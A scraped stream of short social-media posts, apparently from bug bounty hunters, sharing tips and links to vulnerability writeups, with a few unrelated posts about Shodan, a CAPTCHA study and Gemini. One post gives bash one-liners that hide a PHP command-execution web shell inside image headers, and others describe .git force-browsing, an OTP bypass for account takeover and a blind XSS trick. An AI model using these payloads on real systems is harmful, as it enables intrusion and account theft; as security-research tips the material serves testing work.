I reported this very interesting Business Logic flaw and thought it would be good to make a small writeup on it. So please do read it and I hope it will be helpful. sagarsajeev.medium.com/business-logic… #bugbounty #bugbountytips #vulnerabilities #cybersecurity #infosec #cybersecuritytips

#bugbountytips redacted.com/.git -->403 redacted.com/.git/HEAD -->200 redacted.com/.git/objects -->200 redacted.com/.git/config -->200 Make sure you force browse these endpoints if you've got a forbidden git directory. May result in information disclosures. Happy hunting!

Thursday Bounties⚡ Vulnerabilities Reported : - Bypassed Cloudflare and Found Origin IP. - Broken Access Control Tip:- lnkd.in/giP6b4pB This tool may help when dealing with Cloudflare WAF's. #bugbounty #cybersecurity #bugbountytips #redteam #vapt

I just published a small writeup about Server Side Template Injection (SSTI) I recently reported. Here's the link to the writeup : sagarsajeev.medium.com/server-side-te… #bugbounty #bugbountytips #bughunting #cybersecurity #cybersecuritytips #infosec

A collection of useful Nmap NSE Scripts ... github.com/emadshanab/Nma… Cc Emad Shanab - أبو عبد الله #security #bugbounty #bountyresources #collection #bugbountytips #infosec #hacking #cybersecurity

Basic JWT Auth Flow:

I found a very interesting case of OTP bypass leading to ATO. 1) Enter an invalid six-digit OTP and forward the request. 2) Intercept the response and there you will find the correct OTP encoded in base64. 3) Decode it for the correct OTP. Impact: Account Takeover #bugbounty

Do checkout my new writeup on a File Upload Bypass leading to RCE. sagarsajeev.medium.com/file-upload-by… #bugbounty #cybersecurity #bugbountytips #vulnerabilities #redteam #infosec

Show me what you got! Do it 😂

I reported this vulnerability which allowed the attacker to unsubscribe any user from the Target website’s email notification service. I've also published a writeup on that here: sagarsajeev.medium.com/unsubscribe-an… #bugbounty #bugbountytips #vulnerabilities #cybersecurity #infosec #redteam

Finding blind XSS is hard, but let's make it a bit easier. Set this in Burp and wait until an admin views your User-Agent in a vulnerable application! 💉 Thanks 1bdool492 🔻 for this great tip! #bugbounty #bugbountytips 👇

I've recently published a number of new bug bounty writeups over at my Medium handle. I forgot to update it here on Twitter. Please check them out and let me know your feedback. sagarsajeev.medium.com #bugbounty #bugbountytip #cybersecurity

If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload. echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png #bugbountytip #ctf #hacking

Found this interesting script called LinPEAS which can essentially discover possible paths to escalate privileges on Linux or Unix machines. It can be particularly helpful in pwning CTF challenges. github.com/carlospolop/PE… #infosec #cybersecurity #CheatSheet #security #linux

We recently found a vulnerability affecting Hyundai and Genesis vehicles where we could remotely control the locks, engine, horn, headlights, and trunk of vehicles made after 2012. To explain how it worked and how we found it, we have ꙅɿɘƚɔɘqꙅ as our mock car thief:

Now you don't have a excuse to start Complete a Practical Study Plan to become a successful cybersecurity engineer based on roles like Pentest, AppSec, Cloud Security, DevSecOps and so on... 👇

░░░░░░░░░░░░░░░ 0%

The $5 Membership sale is now live! The sale lasts until July 17 23:59 UTC: account.shodan.io/billing/member

Humans now slower and worse at solving CAPTCHAs than ML-powered bots. arxiv.org/abs/2307.12108

Seeing some qs on what Gemini *is* (beyond the zodiac :). Best way to understand Gemini’s underlying amazing capabilities is to see them in action, take a look ⬇️